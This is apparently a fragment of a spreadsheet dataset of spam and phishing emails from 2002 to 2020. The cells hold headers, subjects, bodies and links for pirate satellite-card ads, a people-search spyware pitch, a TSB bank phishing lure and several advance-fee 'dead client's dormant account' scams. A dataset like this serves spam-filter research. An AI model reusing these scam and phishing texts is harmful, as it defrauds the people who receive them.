    <t>Tired of paying big bucks for satellite t.v.?\n\nTHEN DONT!\n\nFor as low as $97 you can buy the programming card that will\ngive you all the channels.  YES ALL OF THEM, including pay channels\nand pay per view.  You will never have another satellite or cable bill\nagain.  \n\n[URL]http://11.lspeedhost.net[/URL]\n\n\nFOR AS LITTLE AS $97 YOU NOW GOT A WORKING UNBLOCKED RECEIVER WITH \nALL CHANNELS !!! 60+ movie channels 20+ PRON CHANNELS ,etc.. ALL THE \nCHANNELS ARE UNLOCKED!!! INCLUDING ALL PAY PER VIEW AND EVENTS FOR \nFREE!  FOR LIFE!\n\n[URL]http://11.lspeedhost.net[/URL]\n\n\n5963HgYk7-980lnZG6754dLNm8-294DcnP4174Lcsd2-914QRTr7194Fyjl55</t>
  </si>
  <si>
    <t>http://11.lspeedhost.net http://11.lspeedhost.net</t>
  </si>
  <si>
    <t>4505</t>
  </si>
  <si>
    <t>To: JM@NETNOTEINC.COM\nFrom: Classic Wines &lt;greatoffers@sendgreatoffers.com&gt;\nDate: Tue, 24 Sep 2002 09:46:03 -0500</t>
  </si>
  <si>
    <t>Tue, 24 Sep 2002 09:46:03 -0500</t>
  </si>
  <si>
    <t>Classic Wines &lt;greatoffers@sendgreatoffers.com&gt;</t>
  </si>
  <si>
    <t>Get a FREE Bottle of Wine &amp; Tasting Kit</t>
  </si>
  <si>
    <t xml:space="preserve">  \n  \n| ![Classic Wines]([URL]http://www.beertrips.com[/URL]\n| ![The World's Best\nWines]([URL]http://www.beertrips.com[/URL]  \n---|---  \n  \n![Free Wine Kit]([URL]http://www.beertrips.com[/URL]\n\n![]([URL]http://www.beertrips.com[/URL]\n\n**_All of this can be  \nYours for only  \n$12.99*_**\n\n| ![]([URL]http://www.beertrips.com[/URL] |\n\n2 Bottles of Premium Wine  \n---|---  \n![]([URL]http://www.beertrips.com[/URL] |\n\n2 Elegant Wine Glasses  \n![]([URL]http://www.beertrips.com[/URL] |\n\nCapitano Waiter's Corkscrew  \n![]([URL]http://www.beertrips.com[/URL] |\n\nMarble Bottle Stopper  \n![]([URL]http://www.beertrips.com[/URL] |\n\nDelicious Gourmet Wine Crackers  \n![]([URL]http://www.beertrips.com[/URL] |\n\nMember Discounts on Additional Wine Selections  \n![]([URL]http://www.beertrips.com[/URL] |\n\nOur Cellar Profile newsletter  \n  \n**_Total Retail Value of this Special Offer - $42.95_**\n\n![]([URL]http://www.beertrips.com[/URL]  \n![]([URL]http://www.beertrips.com[/URL]\n\n![]([URL]http://www.beertrips.com[/URL]\n\n**_A special offer for the discriminating  \nwine drinker._**\n\n**In** **dulge your love of adventure . discovery . and fine wine from the\ncomfort of your home with our convenient program.** Receive two expertly\nselected premium wines for the price of one - only $12.99* - 50% off the\nregular price - delivered to your door with our Wine Starter Kit as a FREE\nGift. Starter Kit includes, 2 Elegant Wine Glasses, a Capitano Waiter's\nCorkscrew, Gourmet Wine Crackers and MORE!\n\nYou'll have your choice of two reds, two whites or one of each. One month you\nmay have the pleasure of experiencing a wonderfully full-bodied Cabernet\nSauvignon from California and a delicious Chardonnay from Australia. Another\nmonth, you may get an exquisite Chianti from Italy and a fabulous Sauvignon\nBlanc from France. You'll savor a broad range of some of the world's most\nfascinating wine - right in your own home.\n\n**Your satisfaction is 100% guaranteed.** If you are not completely satisfied\nwith the Classic Selections program, you can cancel at any time. **There is no\nminimum to buy and no obligation for further purchases or deliveries.** So,\nuncork your own wine adventure and explore the world's finest vineyards with\nClassic Selections!\n\n![]([URL]http://www.beertrips.com[/URL]  \n  \n&gt;  \n&gt;  *Plus shipping and tax from $7.00 - $9.00 depending on destination state.  \n&gt;  \n&gt;  We accept orders from adults at least 21 or older only. All shipments are\n&gt; delivered by UPS or private courier and the signature of an adult is\n&gt; required at the time of delivery. Offer cannot be combined with any other\n&gt; offer and is void where prohibited. This offer is only valid in the\n&gt; following states: AZ, CA, CO, CT, FL, IA, ID, IL, IN, MI, MO, NC, NE, NJ,\n&gt; NM, NY, OH, OR, TX, VA, WA, WI. List of legal states subject to change.  \n&gt;  Due to legal restrictions in some states, alcohol can not be given away for\n&gt; free. Therefore, the promotion is 50% off of the two bottles which equates\n&gt; to the same as one free bottle.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www.beertrips.com http://www.beertrips.com http://www.beertrips.com http://www.beertrips.com http://www.beertrips.com http://www.beertrips.com http://www.beertrips.com http://www.beertrips.com http://www.beertrips.com http://www.beertrips.com http://www.beertrips.com http://www.beertrips.com http://www.beertrips.com http://www.beertrips.com http://www.beertrips.com http://admanmail.com http://admanmail.com</t>
  </si>
  <si>
    <t>4496</t>
  </si>
  <si>
    <t>To: &lt;zzzz@new-atlantean.com&gt;\nFrom: zzzzrubin@mx03.readyserve21.com\nDate: Tue, 24 Sep 2002 08:08:34 -0400</t>
  </si>
  <si>
    <t>Tue, 24 Sep 2002 08:08:34 -0400</t>
  </si>
  <si>
    <t>zzzzrubin@mx03.readyserve21.com</t>
  </si>
  <si>
    <t>&lt;zzzz@new-atlantean.com&gt;</t>
  </si>
  <si>
    <t>$250,000... as low as $6.50 per month.             edahx</t>
  </si>
  <si>
    <t>When America's top companies compete for your business, you win.\n\nIn today's world, it's important to expect the unexpected. When preparing for the future, we must always consider our family. To plan for your family's future, the right life insurance policy is a necessity. But who wants to pay too much for life insurance? Let us help you find the right quote, quickly and easily...\n\nCompare your coverage...\n$250,000... as low as $6.50 per month.\n$500,000... as low as $9.50 per month.\n$1,000,000... as low as $15.50 per month.\n\n[URL]http://quotes.readyserve21.com[/URL]\n\nTake a moment.\nLet us show you that we are here to save time, and money.\n\nReceive up to 15 quotes in seconds.\n\n[URL]http://quotes.readyserve21.com[/URL]\n\n\nClick here to delete your address from future updates.\n[URL]http://quotes.readyserve21.com[/URL]</t>
  </si>
  <si>
    <t>http://quotes.readyserve21.com http://quotes.readyserve21.com http://quotes.readyserve21.com</t>
  </si>
  <si>
    <t>4498</t>
  </si>
  <si>
    <t>To: undisclosed-recipients:;\nFrom: dbarr4now@earthlink.net\nDate: Tue, 24 Sep 2002 07:49:39 +0100</t>
  </si>
  <si>
    <t>Tue, 24 Sep 2002 07:49:39 +0100</t>
  </si>
  <si>
    <t>dbarr4now@earthlink.net</t>
  </si>
  <si>
    <t>Vacation Time,House need work,Behind in Bills? Refinance while rates are low</t>
  </si>
  <si>
    <t>\n\n![]([URL]http://www.directmedium.com[/URL]\n\n\n\n\n\nWe are strongly against sending unsolicited emails to those who do not wish to\nreceive our special mailings.You have opted in to one or more of our affiliate\nsites requesting to be notified of any special offers we may run from time to\ntime. If you do not wish to receive further mailings, please click this link .\nPlease accept our apologies if you have been sent this email in error. We\nhonor all removal requests.\n\n22\n\n</t>
  </si>
  <si>
    <t>http://www.directmedium.com</t>
  </si>
  <si>
    <t>4501</t>
  </si>
  <si>
    <t>To: efs@lahabrabiz.com\nFrom: "New Product Showcase" &lt;see-msg_6466085@flashmail.com&gt;\nDate: Tue, 24 Sep 2002 06:25:33 -0700</t>
  </si>
  <si>
    <t>Tue, 24 Sep 2002 06:25:33 -0700</t>
  </si>
  <si>
    <t>"New Product Showcase" &lt;see-msg_6466085@flashmail.com&gt;</t>
  </si>
  <si>
    <t>efs@lahabrabiz.com</t>
  </si>
  <si>
    <t>============================================= Brand-New VERSION 7.0 Just Released: Astounding New Software Lets You Find Out Almost ANYTHING about ANYONE... ============================================= Download it right now (no charge card needed): For the brand-new VERSION 7.0, click here: [URL]http://www.freehostaccess.com[/URL]  Discover EVERYTHING you ever wanted to know about: your friends your family your enemies your employees yourself - Is Someone Using Your Identity? even your boss! DID YOU KNOW you can search for ANYONE, ANYTIME, ANYWHERE, right on the Internet? Download this software right now--click here: [URL]http://www.freehostaccess.com[/URL]  This mammoth COLLECTION of internet investigative tools &amp; research sites will provide you with NEARLY 400 GIGANTIC SEARCH RESOURCES to locate information on: * people you trust * screen new tenants or roommates * housekeepers * current or past employment * people you work with * license plate number with name and address * unlisted phone numbers * long lost friends Locate e-mails, phone numbers, or addresses: o Get a Copy of Your FBI file. o Get a Copy of Your Military file. o FIND DEBTORS and locate HIDDEN ASSETS. o Check CRIMINAL Drug and driving RECORDS. o Lookup someone's EMPLOYMENT history. For the brand-new VERSION 7.0, click here: [URL]http://www.freehostaccess.com[/URL]  Locate old classmates, missing family member, or a LONG LOST LOVE: - Do Background Checks on EMPLOYEES before you   hire them. - Investigate your family history, birth, death   and government records! - Discover how UNLISTED phone numbers are located. - Check out your new or old LOVE INTEREST. - Verify your own CREDIT REPORTS so you can   correct WRONG information. - Track anyone's Internet ACTIVITY; see the sites   they visit, and what they are typing. - Explore SECRET WEB SITES that conventional   search engines have never found. For the brand-new VERSION 7.0, click here: [URL]http://www.freehostaccess.com[/URL]  ==&gt; Discover little-known ways to make UNTRACEABLE     PHONE CALLS. ==&gt; Check ADOPTION records; locate MISSING CHILDREN     or relatives. ==&gt; Dig up information on your FRIENDS, NEIGHBORS,     or BOSS! ==&gt; Discover EMPLOYMENT opportunities from AROUND     THE WORLD! ==&gt; Locate transcripts and COURT ORDERS from all     50 states. ==&gt; CLOAK your EMAIL so your true address can't     be discovered. ==&gt; Find out how much ALIMONY your neighbor is paying. ==&gt; Discover how to check your phones for WIRETAPS. ==&gt; Or check yourself out, and you will be shocked at     what you find!! These are only a few things you can do, There is no limit to the power of this software!! To download this software, and have it in less than 5 minutes click on the url below to visit our website (NEW: No charge card needed!) [URL]http://www.freehostaccess.com[/URL]  If you no longer wish to hear about future offers from us, send us a message with STOP in the subject line, by clicking here: mailto:stp_910_b@list.ru?subject=STOP_MXI910  Please allow up to 72 hours to take effect. Please do not include any correspondence in your message to this automatic stop robot--it will not be read. All requests processed automatically.  [KIYs5]</t>
  </si>
  <si>
    <t>http://www.freehostaccess.com http://www.freehostaccess.com http://www.freehostaccess.com http://www.freehostaccess.com http://www.freehostaccess.com</t>
  </si>
  <si>
    <t>4502</t>
  </si>
  <si>
    <t>To: &lt;ilug@linux.ie&gt;\nFrom: &lt;Hugh5546x73@bigfoot.com&gt;\nDate: Tue, 24 Sep 2002 01:31:44 +1200</t>
  </si>
  <si>
    <t>Tue, 24 Sep 2002 01:31:44 +1200</t>
  </si>
  <si>
    <t>&lt;Hugh5546x73@bigfoot.com&gt;</t>
  </si>
  <si>
    <t>Hi -\n\n( [URL]http://club.4tfox.com[/URL] )\n\nYou get emails every day, offering to show you how to make money.\nMost of these emails are from people who are NOT making any money.\nAnd they expect you to listen to them?\n\nEnough.\n\nIf you want to make money with your computer, then you should\nhook up with a group that is actually DOING it.  We are making\na large, continuing income every month.  What's more - we will\nshow YOU how to do the same thing.\n\nThis business is done completely by internet and email, and you\ncan even join for free to check it out first.  If you can send\nan email, you can do this.  No special "skills" are required.\n\nHow much are we making?  Anywhere from $2000 to $9000 per month.\nWe are real people, and most of us work at this business part-time.\nBut keep in mind, we do WORK at it - I am not going to \ninsult your intelligence by saying you can sign up, do no work,\nand rake in the cash.  That kind of job does not exist.  But if\nyou are willing to put in 10-12 hours per week, this might be\njust the thing you are looking for.\n\nThis is not income that is determined by luck, or work that is\ndone FOR you - it is all based on your effort.  But, as I said,\nthere are no special skills required.  And this income is RESIDUAL -\nmeaning that it continues each month (and it tends to increase\neach month also).\n\nInterested?  I invite you to find out more.  You can get in as a\nfree member, at no cost, and no obligation to continue if you\ndecide it is not for you.  We are just looking for people who still\nhave that "burning desire" to find an opportunity that will reward\nthem incredibly well, if they work at it.\n\nTo grab a FREE ID# and have more information, simply go to the \n web address [URL]http://club.4tfox.com[/URL]  and send me an email with following \n informtion\n\n"Send me a free membership!"\n\nBe sure to include your:\n1. First name\n2. Last name\n3. Email address (if different from above)\n\nWe will confirm your position and send you a special report\nas soon as possible, and also Your free Member Number.\n\nIf you are not interested in tring to Earn Money,  :)\nyou are interested in the huge discount from the 140 Online Shops,\nVery Cheap ISP package and many many more,\n\nYou can also go to the web address:\n[URL]http://club.4tfox.com[/URL]\n\nThat's all there's to it.\n\nWe'll then send you info, and you can make up your own mind.\n\nLooking forward to hearing from you!\n\nSincerely, \n\nHugh Zou\n\nP.S. After having several negative experiences with network\nmarketing companies I had pretty much given up on them.\nThis is different - there is value, integrity, and a\nREAL opportunity to have your own home-based business...\nand finally make real money on the internet.\n\nDon't pass this up..you can sign up and test-drive the\nprogram for FREE.  All you need to do is get your free\nmembership.\n\nUnsubscribing: Send a blank email to: removemefromlist@bigfoot.com with\n"Remove" in the subject line.  By submitting a request for a FREE\nDHS Club Membership, I agree to accept email from the DHS Club for\nboth their consumer and business opportunities.\n\n3619ezfT0-011VpTm2924l20\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>1269</t>
  </si>
  <si>
    <t>To: jose@monkey.org\nFrom: TSB Online Banking Team &lt;customercare@tsb.co.uk&gt;\nDate: Tue, 24 Nov 2020 11:17:20 +0300</t>
  </si>
  <si>
    <t>Tue, 24 Nov 2020 11:17:20 +0300</t>
  </si>
  <si>
    <t>TSB Online Banking Team &lt;customercare@tsb.co.uk&gt;</t>
  </si>
  <si>
    <t>Dear Customer</t>
  </si>
  <si>
    <t>Dear User,We recently updated our online banking security for  our customers safety as always. Kindly complete your account update process on our webpage link below[URL]www.tsb.co.uk[/URL] ©TSB Online Banking Team</t>
  </si>
  <si>
    <t>www.tsb.co.uk</t>
  </si>
  <si>
    <t>1322</t>
  </si>
  <si>
    <t>To: elia@med.uniroma2.it\nFrom: mike paul mike &lt;mikepaul@eresmas.com&gt;\nDate: Tue, 24 May 2005 00:39:12 +0000</t>
  </si>
  <si>
    <t>Tue, 24 May 2005 00:39:12 +0000</t>
  </si>
  <si>
    <t>mike paul mike &lt;mikepaul@eresmas.com&gt;</t>
  </si>
  <si>
    <t>elia@med.uniroma2.it</t>
  </si>
  <si>
    <t>reply my mail to you</t>
  </si>
  <si>
    <t>PLOT 13 VICTORIA GARDEN CITY,Email: paull@tsamail.co.za INTRODUCTION: My name is mike Paul. I know this proposal will come to youas a surprise because we havenot met before either physically or through anycorrespondence.  I have no doubt in your ability to handle this proposalinvolving huge sum of USD$9.5MILLION  on my familys behalf.THE SUBJECT: A Foreign Customer (MR. JOHN WOOD) who died along with hisentire family in 31st JULY , 2000 in a plane crash. since his death, ashis accounts Officer I have made frantic efforts to locate any of hisrelative, because he has a substantial amount with our Branch. Uphill datenobody has showed up to lay claim on his deposit.The Banking law andguideline here in my Country stipulates that if any customer account remainsunserviceable or dormant, and unclaimed after Four years, the account willbe transferred into the Bank treasury on grounds ofMoney Laundering ,Drug and Anti -Terrorist activities. As a Banker I know what happens to such funds, the Executive Director andthe Chairman of the Board of Directors will share it amongst themselves andsend down memos to us for reconciliation. THE PROPOSAL: My request of a foreigner in this business is occasioned bythe fact that an Indigene of My Country cannot stand as next of kin to aforeigner. It is therefore on this premise that I seek your cooperation Bystanding as a relative to MR JOHN WOOD. As an Insider I will provide you with all relevant Information/documentsthat will authenticate the Claim. Note that your Physical presence is notneeded at the Bank, I will Guide you on the Steps to take. The Bank willonly ask for verifiable Documents which I will provide. In All Fairness I am willing to share the money with you on Agreed Terms of usd4.5million for you and usd$5million for me.For your Information, I have done my home work very well, before embarkingon the process of moving out the funds out of the bank through a Next ofKin. The Funds is much that no right thinking person can afford to let suchopportunity pass him by. For more Information see BBC News on--[URL]http://news.bbc.co.uk[/URL] your reply through this mailbox,paull@tsamail.co.za or see thenote belowYours faithfully,Mr.mike murryN.BIf you are ready to work with me, provide me immediately with your fullnames, telephone and fax numbers to after which I will disclose detailsto you.</t>
  </si>
  <si>
    <t>3228</t>
  </si>
  <si>
    <t>To: nan\nFrom: Gary William &lt;stella.sigcau4@virgilio.it&gt;\nDate: Tue, 24 Jul 2007 17:56:43 +0100</t>
  </si>
  <si>
    <t>Tue, 24 Jul 2007 17:56:43 +0100</t>
  </si>
  <si>
    <t>FROM: Mr.Gary William</t>
  </si>
  <si>
    <t>Dear Friend,\n \nLet me start by introducing myself. I am Gary William, \nthe chief Auditor of Bank Of Scotland.I have an obscured business \nsuggestion for you. One of our accounts with a holding balance of Money \nValued GBP £35,000,000.00 .(Thirty Five Million Pounds only) has been \ndormant and has not been operated for the past six years. \n \n&gt;From my \ninvestigations and confirmations, the owner of this account Mr. Andreas \nSchranner a citizen of Germany who perished in a plane crash [Concorde \nAir Flight AF4590] with the whole passengers aboard on 31 July2000. And \nfor your perusal you can view this web site:[URL]http://news.bbc.co[/URL]\nuk/1/hi/world/europe/859479.stm and since then nobody has done anything \nas regards the claiming of this money because he has no family members \nwho are aware of the existence of the account nor the funds.\n\nAlso \nInformation from the National Immigration stated that he was also \nsingle on entry into Scotland.I have secretly discussed this matter \nwith some of the bank officials and we agreed to find a reliable \nforeign partner to deal with.\n \nThis transaction is totally risk and \ntrouble free as the fund is legitimate and does not originate from \ndrugs, money laundering, terrorism or any other illegal act. \n \nThe \nsharing of the fund between us, is as follows; 40% of the total sum \nwill go to you for your effort and commitment to the success of this \ntransaction. 60% for me and my colleagues. \n \n \nTelephone: \n+447024079712\nGary William\n\n\n\n\n\n</t>
  </si>
  <si>
    <t>3226</t>
  </si>
  <si>
    <t>To: nan\nFrom: bjsri budak &lt;bjsri072@hotmail.com&gt;\nDate: Tue, 24 Jul 2007 09:10:42 +0000</t>
  </si>
  <si>
    <t>Tue, 24 Jul 2007 09:10:42 +0000</t>
  </si>
  <si>
    <t>bjsri budak &lt;bjsri072@hotmail.com&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">FROM THE DESK OF : BJSRI BUDAK, </t>
  </si>
  <si>
    <t>FROM THE DESK OF : BJSRI BUDAK,\nAUDITING AND ACCOUNTING SECTION,\nBANK OF AFRICAN ( B.O.A )\nOUAGADOUGOU BURKINA-FASO,WEST AFRICA.\n\nAttention Please,\n\nThis message might meet you in utmost surprise, however,it's just my urgent \nneed for foreign partner that made me to contact you for this transaction. I \nam a banker by profession from Burkina faso in west Africa and currently \nholding the post of Director Auditing and Accounting unit of the bank.I have \nthe opportunity of transfering the left over funds ($15.6million) of one of \nmy bank clients who died along with his entire family on 31 july 2000 in a \nplane crash.You can confirm the genuiness of the deceased death by clicking \non this web site\n\n[URL]http://news.bbc.co.uk[/URL]\n\nHence,i am inviting you for a business deal where this money can be shared \nbetween us in the ratio of 60/30 while 10% will be mapped out for \nexpenses.If you agree to my business proposal.further details of the \ntransfer will be forwarded to you as soon as i receive your return mail,have \na great day.\n\nMake sure you keep this transaction as your top secret and make it \nconfidential till we receives the fund into the account that you will \nprovide to the bank. dont disclose it to any body, because the secrecy of \nthis transaction is as well as the success of it.\n\n\nYours faithfully,\nMr Bjsri Budak.\n\nPlease reply me here:Email; bjsri_budak04@myway.com\n\n_________________________________________________________________\nMSN Hotmail : crez votre adresse e-mail gratuite &amp;  vie ! \n[URL]http://www.msn.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>45</t>
  </si>
  <si>
    <t>To: webmaster@aclweb.org\nFrom: Oliveira Savimbi &lt;olivsav@netscape.net&gt;\nDate: Tue, 24 Dec 2002 16:52:18 -0000</t>
  </si>
  <si>
    <t>Tue, 24 Dec 2002 16:52:18 -0000</t>
  </si>
  <si>
    <t>Oliveira Savimbi &lt;olivsav@netscape.net&gt;</t>
  </si>
  <si>
    <t>PRIVATE EMAIL MESSAGE</t>
  </si>
  <si>
    <t>Good Day,\n\nWith warm heart I offer my friendship, and send my best wishes in this special season.\n\nHowever strange or surprising this contact might seem to you, as we have not met personally or had any dealings in the past, I humbly ask that you take due consideration of its importance and immense benefit. I also sincerely seek your confidence, as I make this proposal to you as a person of integrity.\n\nFirst and foremost I wish to introduce myself properly to you. My name is Oliveira Chuli Savimbi, I am a nephew and Personal Assistant to Late Jonas Malheiro Savimbi, leader of UNITA (National Union for the Total Independence of Angola). As led by my instinct, I selected your email address from an internet directory, in my search for a partner, hence this email. \n\nMy Uncle(Mentor) was killed in a battle with government forces of Angola, led by President Dos Santos, on Friday 22nd February 2002. After his death, Mr. Antonio Dembo who was his second in command, assumed office as leader of UNITA, due to lack of the Charisma my Uncle had carried the party with in Dembo, there was chaos and struggle for leadership. Prominent members like Carlos Morgado lobbied to depose him and assume office as leader to enrich themselves and some of them who saw me as a threat to their ambitions, including Mr.Dembo, planned to kill me. The tension and confusion in UNITA become uncontrollable when Mr. Dembo died 10days after my Uncle's death. As I lost my mentor in this struggle which has been on for three decades now, not so much of this struggle interests me anymore, as there is now no sense of direction. I now desire a peaceful life, as I am no more interested in conflicts and wars. For this reason, I secretly left Angola and came here (Holland) to seek!\n political asylum.\n\nI am sincerely proposing to you to render me your highly needed assistance in respect to safekeeping of some of my Uncle's money that arose from Diamonds sales. This money (US$18.5million), which was already on its way to my Uncle's Swiss Bank account, through the Diplomatic means we use to move money abroad, and was on transit with a private safe deposit security company here in Amsterdam, Holland in February when the tragic incident of my Uncle's death occurred. I then instructed the company to secure the consignment containing the money pending on further instructions from me. I have waited for sometime now for security reasons, and have now deicded to act with your reliable assistance. As a matter of fact, the reason I came to Holland and sought for political asylum here is the safe deposit. \n\nPresident Dos Santos has lobbied the International Community to freeze my Uncle's assets and accounts abroad, to ground UNITA, and has already done this in Angola. Hence I cannot lodge the funds in my name. Also I did not declare the funds to the here.\n\nI plan to use this money to safeguard my future. It is very essential that you understand that the kind of trust and confidence I want to put in you is extraordinary, and an act of desperation on my part, in order not to lose this money. Also, ensure that this contact with you should be treated with utmost secrecy.\n\nYour role in this project, is clearing the safety deposit containing the money which is deposited in my name, from the Security company, after which, the money will lodged into an account preferably a new account you should open for this transaction.  My share of the money will be returned to me when my asylum application in this country is granted, and I have permission to do business and open an account here. \n\nFor your reliable assistance, I will reward you with 15%($2,775,000) of the money. \n\nI have with me, the Certificate of Deposit for the consignment containing the funds, which will be used for claim from the security company, and the release codes of the vaults. Also, everything will be legally processed for transfer of ownership to you, and this transaction should be completed immediately depending on your prompt response.\n\nI thank you in advance as I anticipate your assistance in enabling me achieve this goal. \n\nPlease contact me whether or not you are interested in assisting me. This will enable me scout for another partner in the event of non-interest on your part.\n\nTo know more about the struggle by UNITA to liberate Angola, click on the link below and read. \n\n[URL]http://www.the-idler.com[/URL]\n\nSincerely,\nO.C.Savimbi.\n\n\n</t>
  </si>
  <si>
    <t>http://www.the-idler.com</t>
  </si>
  <si>
    <t>3050</t>
  </si>
  <si>
    <t>To: kennethcolemailcom@thestudentzon.com\nFrom: kennethcoleszmailcom@thestudentzonemail.com\nDate: Tue, 24 Apr 2007 14:03:40 -0000</t>
  </si>
  <si>
    <t>Tue, 24 Apr 2007 14:03:40 -0000</t>
  </si>
  <si>
    <t>kennethcoleszmailcom@thestudentzonemail.com</t>
  </si>
  <si>
    <t>kennethcolemailcom@thestudentzon.com</t>
  </si>
  <si>
    <t>From Dr Kenneth</t>
  </si>
  <si>
    <t>Independent Committee of Eminent Persons (ICEP),London. Email:kcole444@yahoo.co.uk ATTENTION: I am a member of Independent Committee of Eminent Persons (ICEP),London. ICEP is charged with the responsibility of finding bank accounts in Switzerland belonging to non-Swiss indigenes, which have remained dormant since World War II.  It may interest you to know that in July of 1997, the Swiss Banker's Association published a list of dormant accounts originally opened by non-Swiss citizens.  These accounts had been dormant since the end of World War II (May 9, 1945). Most belonged to Holocaust victims. The continuing efforts of the Independent Committee of Eminent Persons (ICEP)have since resulted in the discovery of additional dormant accounts -54 ,000 in December, 1999. The published lists contain all types of dormant accounts,including interest-bearing savings accounts, securities accounts, safe deposit boxes, custody accounts, and non-interest-bearing transaction accounts. Numbered accounts are also included.Interest is paid on accounts that were interest bearing when established. The Claims Resolution Tribunal (CRT) handles processing of all claims on accounts due non-Swiss citizens. A dormant account of Hami Ramzy with a credit balance of 15,800,000 US dollar plus accumulated interest was discovered by me. The beneficiary was murdered during the holocaust era, leaving no WILL and no possible records for trace of theirs. The Claims Resolution Tribunal has been mandated to report all unclaimed funds for permanent closure of accounts and transfer of existing credit balance into the treasury of Switzerland government as provided by the law for management of assets of deceased benefi ciaries who died interstate living no wills). Being a top executive at ICEP, I have all secret details and necessary contacts for claim of the funds without any hitch.  The funds will be banked in the Holland, London or Spain, being a safe for funds and we can share the funds and use in investment of our choice. Due to the sensitive nature of my job,  I need a foreigner to HELP claim the funds. All that is required is for you to provide me with your details for processing of the necessary legal and administrative claim documents for transfer of the funds to you. Kindly provide me with your full name, address, and telephone/fax.  For the fund to be transferred to a secure, numbered account in your name and country via any of the corresponding banks in London or Spain, of which you will be capable of accessing the funds gradually and transferring to your country and other banks of choice in the world.  My share will be 60 percent and your share is 40 pe r cent of the total amount. THERE IS NO RISK INVOLVED, The Holocaust Claims Processing Office has put funds in Escrow awaiting submission of valid claims for necessary disbursement, I find myself privileged to have this information and this may be a great opportunity for a life time of success without risks. Thanking you in anticipation for your prompt response. Regards, Dr Kenneth cole. ___________________________________ The Student Zone [URL]http://www.thestudentzone.com[/URL]</t>
  </si>
  <si>
    <t>http://www.thestudentzone.com</t>
  </si>
  <si>
    <t>3049</t>
  </si>
  <si>
    <t>To: R@M\nFrom: aditya monu &lt;noreply@en.facebox.com&gt;\nDate: Tue, 24 Apr 2007 11:04:52 +0200</t>
  </si>
  <si>
    <t>Tue, 24 Apr 2007 11:04:52 +0200</t>
  </si>
  <si>
    <t>aditya monu &lt;noreply@en.facebox.com&gt;</t>
  </si>
  <si>
    <t>Invitation from aditya monu</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. --incrowd_6506e2e6636163656626f7892e636f26d05b3743 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Hello, aditya monu (eagle09) is building his online friends network on : [URL]http://en.facebox.com[/URL] Accept this friendship request and join Facebox! [URL]http://en.facebox.com[/URL] Create a personal Facebox web page with - Blog - Photo album - Guestbook - Friends network - Videos- Music- And much more... ---------------------------------------------------------------- Are you already a member? Add aditya monu as a friend: [URL]http://en.facebox.com[/URL] Don't know who aditya monu is? Visit his Facebox profile page.: [URL]http://en.facebox.com[/URL] Do you not wish to receive these e-mails? Block your e-mail address: [URL]http://en.facebox.com[/URL] ---------------------------------------------------------------- --incrowd_6506e2e6636163656626f7892e636f26d05b3743 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Invitation from aditya monu Facebox 			Tuesday 24 April at 11:04 		 Invitation from aditya monu eagle09 Hello, aditya monu (eagle09) is building his online friends network on [URL]http://en.facebox.com[/URL] Accept this invitation And join Facebox! Create a personal Facebox web page with Blog Photo album Guestbook Friends network Videos Music And much more... Already a member? Add aditya monu as your friend. Don't know who aditya monu is?  Visit his profilepage. Do you not wish to receive these e-mails? Block your e-mail address.   --incrowd_6506e2e6636163656626f7892e636f26d05b3743--</t>
  </si>
  <si>
    <t>http://en.facebox.com http://en.facebox.com http://en.facebox.com http://en.facebox.com http://en.facebox.com http://en.facebox.com</t>
  </si>
  <si>
    <t>BEL</t>
  </si>
  <si>
    <t>3048</t>
  </si>
  <si>
    <t>To: nan\nFrom: benjamin ame &lt;benja_ame024@hotmail.fr&gt;\nDate: Tue, 24 Apr 2007 09:30:07 +0200</t>
  </si>
  <si>
    <t>Tue, 24 Apr 2007 09:30:07 +0200</t>
  </si>
  <si>
    <t>benjamin ame &lt;benja_ame024@hotmail.fr&gt;</t>
  </si>
  <si>
    <t>FROM  AME  BENJAMIN.</t>
  </si>
  <si>
    <t>Dearerst,\n\nI MAKE THIS APPEAL WITH THE UNDERSTANDING THAT ANY FACTS OR OPINION \nEXPRESSED BY ME ARE GIVING IN CONFIDENCE AND SOLELY FOR YOUR PERSONAL \nINFORMATION.I am DR.AME BENJAMIN,the manager of bill and exchange at the \nforeign remittance department  Bank of africa burkinafaso.\n\nIn my department I discovered an abandoned sum of US$8.5M, (Eight Million, \nFive Hundred Thousand US Dollars) with account number 14-2558-5976\nthat belongs to one of our foreign customers who died along with his wife \nand only daughter in a plane crash of Alaska Airlines Flight number 261 \nwhich crashed on 31 January, 2000. You shall read more about the crash on \nvisiting this website:\n\n[URL]http://www.cnn.com[/URL]\n\nThe Owner of this account is Mr. Morris Thompson an American and great \nindustrialist and a resident of Alaska.It is therefore upon this discovery \nthat I now decided to make this business proposal to you and for our bank to \nrelease the money to you.\nYou have to follow the instruction which I will be send to you as the next \nof kin or relation to the deceased for safety and\nsubsequent disbursement since nobody is coming for it and I don't want this \nmoney to go into our bank treasury as unclaimed bill.\n\nThe banking law and guidelines here stipulates that if such money remained \nunclaimed after Three years, the money will be transfered into the \nbanktreasury as unclaimed fund. The money has now stayed more than three \nyears and I am preparing documentaion to prove that this money has been\ntransfered to our bank treasury. It will be between me and you only that \nwill know that the money is not transfered into our treasure.\n\nThis request of foreigner as next of kin in this transaction is occasioned \nby the fact that the customer was a foreigner and a Burkinab cannot standas \nnext of kin to a foreigner.In appreciation of your assistance, I am offering \nyou 30% of the total sum. 5% for contingencies (cost of transfer/other \ncharges) likely to be incurred during the course of transaction, while the \nremaining 65% is for me.\n\nUpon receipt of your reply,i will send to you by fax or email the text of \nthe application which you will complete and forward to our bank asking for \nthis money to be paid to you as the next of kin to Mr;Morris Thomson. I will \nnot fail to bring to your notice that this transaction is hitch-free and \nthat you should not entertain any fear as all required arrangements have\nbeen made for the transfer.You should contact me immediately as soon as you \nreceive this mail through the above email.\n\nPLEASE DO NOT HESITATE TO CONTACT ME IMMEDIATELY SHOULD YOU CONSIDER MY\nURGENT REQUEST.\n\nYours Faithfully,\n\nDR.AME BENJAMIN\n\n_________________________________________________________________\nFREE pop-up blocking with the new MSN Toolbar - get it now! \n[URL]http://toolbar.msn.click-url.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://www.cnn.com http://toolbar.msn.click-url.com</t>
  </si>
  <si>
    <t>893</t>
